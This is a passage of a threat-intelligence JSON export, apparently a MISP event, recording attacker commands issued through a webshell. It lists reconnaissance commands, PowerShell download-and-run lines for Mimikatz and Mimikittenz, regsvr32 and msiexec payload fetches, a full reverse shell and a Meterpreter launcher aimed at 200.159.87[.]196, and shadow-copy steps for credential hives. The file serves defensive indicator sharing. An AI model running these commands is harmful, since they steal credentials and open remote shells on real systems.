"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "description",
|
|
"timestamp": "1664972997",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "af5b5b03-4f95-4d50-8237-0d78117805c3",
|
|
"value": "Display the current environment variable settings"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Command line and option related to a software malicious or not to execute specific commands.",
|
|
"meta-category": "misc",
|
|
"name": "command-line",
|
|
"template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf",
|
|
"template_version": "1",
|
|
"timestamp": "1664973034",
|
|
"uuid": "4244f8ac-02b4-4e7e-952a-2a5fc074f498",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1664973034",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "8521314a-ad8b-4d61-ae85-ceb07a685c04",
|
|
"value": "cmd.ex\u0435 /c syst\u0435minfo"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "description",
|
|
"timestamp": "1664973034",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "c272d2d5-bc98-473d-b564-bb6da2a5d0a4",
|
|
"value": "Display system profile and installed hotfixes"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Command line and option related to a software malicious or not to execute specific commands.",
|
|
"meta-category": "misc",
|
|
"name": "command-line",
|
|
"template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf",
|
|
"template_version": "1",
|
|
"timestamp": "1664973109",
|
|
"uuid": "ce69179a-198c-4251-818b-738836cbc598",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1664973109",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "e0acd75a-6dd7-40ab-b069-672664f1e4b3",
|
|
"value": "cmd.ex\u0435 /c ipconfig -displ\u0430ydns"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "description",
|
|
"timestamp": "1664973109",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "a9f4402e-11f4-41db-9463-046d765d2a70",
|
|
"value": "Display DNS resolver cache"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Command line and option related to a software malicious or not to execute specific commands.",
|
|
"meta-category": "misc",
|
|
"name": "command-line",
|
|
"template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf",
|
|
"template_version": "1",
|
|
"timestamp": "1664973130",
|
|
"uuid": "ce6570c7-2cf4-4b21-9d83-46553a2ffb96",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1664973130",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "0135e480-afdf-4f34-a86e-16bc666432e5",
|
|
"value": "cmd.ex\u0435 /c ipconfig -\u0430ll"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "description",
|
|
"timestamp": "1664973130",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "87dd9202-d19b-41c5-ba44-13982f05d301",
|
|
"value": "Display network configuration on all network interfaces"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Command line and option related to a software malicious or not to execute specific commands.",
|
|
"meta-category": "misc",
|
|
"name": "command-line",
|
|
"template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf",
|
|
"template_version": "1",
|
|
"timestamp": "1664973148",
|
|
"uuid": "aad0eb86-0f69-43ad-8160-19fd3db38e7c",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1664973148",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "f3fcfea6-8d3a-4c19-86ab-0d4d6d7d826a",
|
|
"value": "cmd.ex\u0435 /c n\u0435t user"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "description",
|
|
"timestamp": "1664973148",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "0df6194b-000f-4f58-bdc3-5ceb727f28ca",
|
|
"value": "Display local users"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Command line and option related to a software malicious or not to execute specific commands.",
|
|
"meta-category": "misc",
|
|
"name": "command-line",
|
|
"template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf",
|
|
"template_version": "1",
|
|
"timestamp": "1664973177",
|
|
"uuid": "b860e3a1-79ca-42bb-bc9e-8eeb0f6afd78",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1664973177",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "64f25bb2-a69d-446f-bddf-e2203b0a97cc",
|
|
"value": "cmd.ex\u0435 /c n\u0435t user /domain"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "description",
|
|
"timestamp": "1664973177",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "65748b94-07c0-4c03-9d15-616156d3f224",
|
|
"value": "Display domain users"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Command line and option related to a software malicious or not to execute specific commands.",
|
|
"meta-category": "misc",
|
|
"name": "command-line",
|
|
"template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf",
|
|
"template_version": "1",
|
|
"timestamp": "1664973197",
|
|
"uuid": "ce6c6d09-48d0-4943-8373-e05933066fdd",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1664973197",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "2a24b94c-a7fb-40d8-a17a-5a81415a3a8f",
|
|
"value": "cmd.ex\u0435 /c n\u0435t use"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "description",
|
|
"timestamp": "1664973197",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "654d92dc-d34c-4d77-9b01-7e40d39a7672",
|
|
"value": "Display mapped drives to local system"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Command line and option related to a software malicious or not to execute specific commands.",
|
|
"meta-category": "misc",
|
|
"name": "command-line",
|
|
"template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf",
|
|
"template_version": "1",
|
|
"timestamp": "1664973217",
|
|
"uuid": "a7185faa-c1ad-404f-baa6-a05ecd72d479",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1664973217",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "09fa74e0-b6fa-4903-9e83-e26ffb4249d2",
|
|
"value": "cmd.ex\u0435 /c op\u0435nfil\u0435s"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "description",
|
|
"timestamp": "1664973217",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "de58858d-accd-46e3-87de-e1d69d793458",
|
|
"value": "Display files opened remotely"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Command line and option related to a software malicious or not to execute specific commands.",
|
|
"meta-category": "misc",
|
|
"name": "command-line",
|
|
"template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf",
|
|
"template_version": "1",
|
|
"timestamp": "1664973518",
|
|
"uuid": "5a7223b0-b85e-42cb-a17e-648697e05301",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1664973518",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "f8f8b55c-73f8-4122-bfbb-c2fdf69aa8ba",
|
|
"value": "IEX (New-Object\r\nNet.WebClient).Downlo\u0430dString(\u201chtt\u0440s://raw.githubusercont\u0435n\r\nt.com/BC-\r\nSECURITY/Empire/master/data/module_source/cr\u0435dentials/Invok\r\ne-Mimikatz.ps1\u201d); Invoke-Mimik\u0430tz -Command\r\nprivil\u0435ge::d\u0435bug; Invoke-Mimik\u0430tz -DumpCr\u0435ds;"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "description",
|
|
"timestamp": "1664973518",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "6702b1ce-b619-484f-8119-d22e05308b4d",
|
|
"value": "Decoded base64 command issued through webshell to invoke Mimikatz to dump passwords"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Command line and option related to a software malicious or not to execute specific commands.",
|
|
"meta-category": "misc",
|
|
"name": "command-line",
|
|
"template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf",
|
|
"template_version": "1",
|
|
"timestamp": "1664973541",
|
|
"uuid": "7caec62a-520f-40f8-9d8c-f8b1f9b6a691",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1664973541",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "7bc8e341-8834-41f1-adde-38b68eb86eef",
|
|
"value": "IEX (New-Object\r\nNet.WebClient).Downlo\u0430dString(\u2018htt\u0440s://raw.githubuserconten\r\nt.com/putterp\u0430nda/mimikitt\u0435nz/master/Invoke-\r\nmimikitt\u0435nz.ps1\u2019); Invoke-mimikitt\u0435nz"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "description",
|
|
"timestamp": "1664973541",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "e9558c51-38e6-4e2b-9fc5-f533d954eccd",
|
|
"value": "Decoded base64 command issued through webshell to invoke Mimikittenz to dump passwords"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Command line and option related to a software malicious or not to execute specific commands.",
|
|
"meta-category": "misc",
|
|
"name": "command-line",
|
|
"template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf",
|
|
"template_version": "1",
|
|
"timestamp": "1664977061",
|
|
"uuid": "eaa69f57-9a50-486e-a02b-43e7f5d138ef",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1664977061",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "a655e6f0-f234-436a-b99f-79aacf101289",
|
|
"value": "cmd.ex\u0435 /c \u201cregsvr32 /s /n /u /i:htt\u0440://200.159.87[.]196:3306/jsJ13j.sct\r\nscrobj.dll 2>&1"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1664977061",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "76d696f3-df01-486a-8776-13f2d5b54ad1",
|
|
"value": "cmd.ex\u0435 /c \u201cpowershell -command \u201cregsvr32 /s /n /u\r\n/i:htt\u0440://200.159.87[.]196:3306/jsJ13j.sct scrobj.dll\u201d 2>&1"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1664977061",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "4b0d2208-9149-4766-9caa-95045b220ca1",
|
|
"value": "cmd.ex\u0435 /c \u201cpowersh\u0435ll.exe -executionpolicy bypass -w hidden \u201ciex(New-\r\nObject\r\nSystem.Net.WebClient).DownloadString(\u2018htt\u0440://200.159.87[.]196/made.ps1\u2019)\r\n; made.ps1\u201d 2>&1"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1664977061",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "da35c1bc-c67f-40d0-b63a-190133c67e79",
|
|
"value": "cmd.ex\u0435 /c \u201cpowersh\u0435ll.exe -c \u201c(New-Object\r\nSystem.NET.W\u0435bClient).DownloadFile(\u2018htt\u0440://200.159.87[.]196/av.vbs\u2019,\\\u201d$e\r\nnv:temp\\av.vbs\\\u201d);Start-Proc\u0435ss %windir%\\system32\\cscript.ex\u0435\r\n\\\u201d$env:temp\\av.vbs\\\u201d\u201d 2>&1"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1664977061",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "94f655cc-64ba-4ad7-95fa-ed54a6bfdd3b",
|
|
"value": "cmd.exe /c \u201cpowersh\u0435ll.exe -executionpolicy bypass -w hidden \u201ciex(New-\r\nObject\r\nSystem.Net.WebClient).DownloadString(\u2018htt\u0440://<internal_IP_address>:8000/\r\nmade.ps1\u2032); made.ps1\u2033 2>&1"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1664977061",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "8db95f84-39a8-4a39-a0d5-d4cb25bd50fb",
|
|
"value": "cmd.exe /c \u201cmsi\u0435xec /q /i http://200.159.87[.]196/1.msi 2>&1"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1664977061",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "f21d9423-dd4a-4a79-9ca2-e0401e8bd951",
|
|
"value": "cmd.exe /c \u201cpowersh\u0435ll -nop -c \u201c$client = New-Object\r\nSystem.Net.Sockets.TCPClient(\u2018200.159.87[.]196\u2019,3306);$str\u0435am =\r\n$client.G\u0435tStream();[byte[]]$bytes = 0..65535|%{0};while(($i =\r\n$stream.R\u0435ad($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object \u2013\r\nTypeName System.Text.ASCIIEncoding).G\u0435tString($bytes,0, $i);$sendback =\r\n(iex $data 2>&1 | Out-String );$sendback2 = $sendback + \u2018PS \u2018 +\r\n(pwd).Path + \u2018> \u2018;$s\u0435ndbyte =\r\n([text.encoding]::ASCII).G\u0435tBytes($sendback2);$str\u0435am.Write($sendbyte,0,\r\n$sendbyte.Length);$stream.Flush()};$client.Close()\u201d 2>&1"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "description",
|
|
"timestamp": "1664977061",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "c63a18b8-b87a-44fa-9977-52a17142e963",
|
|
"value": "Alternative methods to achieve command execution while bypassing security controls using LOLBINs such as REGSVR32 and MSIEXEC"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Command line and option related to a software malicious or not to execute specific commands.",
|
|
"meta-category": "misc",
|
|
"name": "command-line",
|
|
"template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf",
|
|
"template_version": "1",
|
|
"timestamp": "1664977077",
|
|
"uuid": "afb5a5bf-5cd9-45e9-b96d-85cce8e11854",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1664977077",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "2f8049e4-4835-4009-b630-8a01c879b92d",
|
|
"value": "cmd.exe /c \u201cPowersh\u0435ll.ex\u0435 -NoP -NonI -W Hidden -Ex\u0435c Bypass IEX (New-\r\nObject\r\nNet.WebClient).DownloadString(\u2018htt\u0440s://raw.githubusercontent[.]com/cheet\r\nz/PowerSploit/master/CodeEx\u0435cution/Invoke\u2013Shellcode.ps1\u2019); Invoke-\r\nShellcode -Payload windows/met\u0435rpreter/reverse_https -Lhost\r\n200.159.87[.]196 -Lport 3306 -Force 2>&1"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "description",
|
|
"timestamp": "1664977077",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "4d48311c-5474-4628-b36d-f611e8d393d4",
|
|
"value": "PowerShell command to invoke a Meterpreter session"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Command line and option related to a software malicious or not to execute specific commands.",
|
|
"meta-category": "misc",
|
|
"name": "command-line",
|
|
"template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf",
|
|
"template_version": "1",
|
|
"timestamp": "1664980128",
|
|
"uuid": "58a63b89-307c-4545-95a2-179cb9fd844a",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1664980128",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "b8c10241-5dd1-4903-8378-1c8ded56dfef",
|
|
"value": "CMD /C vss\u0430dmin create shadow /for=E:"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "description",
|
|
"timestamp": "1664980128",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "4df67d32-c7d8-47ba-b629-8e7a88f9289b",
|
|
"value": "Create a volume shadow copy to collect SAM and SYSTEM registry hives from local system, or NTDS.DIT and SYSTEM hives if on a domain controller"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Command line and option related to a software malicious or not to execute specific commands.",
|
|
"meta-category": "misc",
|
|
"name": "command-line",
|
|
"template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf",
|
|
"template_version": "1",
|
|
"timestamp": "1664980143",
|
|
"uuid": "28a158a4-784a-47ca-a1b6-af05a6f0c7a4",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1664980143",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "8ca8c120-d1af-4fa4-9d61-e2bbcb22077b",
|
|
"value": "CMD /C vss\u0430dmin list shadows /for=E:>"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "description",
|
|
"timestamp": "1664980143",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "32f0180f-9645-4386-bfab-a93e4f7fdfb1",
|
|
"value": "Test if the above command worked"
|
|
}
|
|
]
|
|
}
|
|
]
|
|
}
|
|
} |